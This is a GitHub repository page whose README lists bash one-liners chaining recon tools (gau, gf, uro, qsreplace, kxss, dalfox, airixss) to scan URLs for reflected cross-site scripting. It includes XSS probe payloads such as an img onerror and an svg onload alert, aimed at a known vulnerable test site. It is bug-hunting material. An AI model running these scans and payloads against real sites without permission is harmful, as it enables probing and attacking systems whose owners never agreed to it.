Skip to content
/ One-liner-XSS-Scanner Public

This is a collection of commands that's help you to find XSS via automation.

0xelkot.medium.com
4 stars 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

0xElkot/One-liner-XSS-Scanner

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 

Repository files navigation

One-liner-XSS-Scanner

This is a collection of commands that's help you to find XSS via automation.

Via Bash Script

Tools:

Kxss : To find reflected values.

uro: Declutters url lists for crawling.

gf: A wrapper around grep, to help you grep for things.

qsreplace: To replace all query string values with a user-supplied value.

Freq: To find alert values.

airixss: To find XSS during recon.

dalfox : It’s a powerfull XSS scanner.

First Case

echo http://testphp.vulnweb.com | gau | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq

1_HTuqyTBftAdkwqfRL3jQ_w

cat param.txt | kxss | awk '{print $9}'| dalfox pipe

1_FO3algvVNFOrDIYh7wKbVQ



cat param.txt | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
echo http://testphp.vulnweb.com | gau | gf xss | uro  |qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

1__JCZZJX2T1XiHxH0FZPTWw

You can Read the full methodology here at Medium

About

This is a collection of commands that's help you to find XSS via automation.

0xelkot.medium.com

Topics

injection xss vulnerability-detection vulnerability-scanners

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published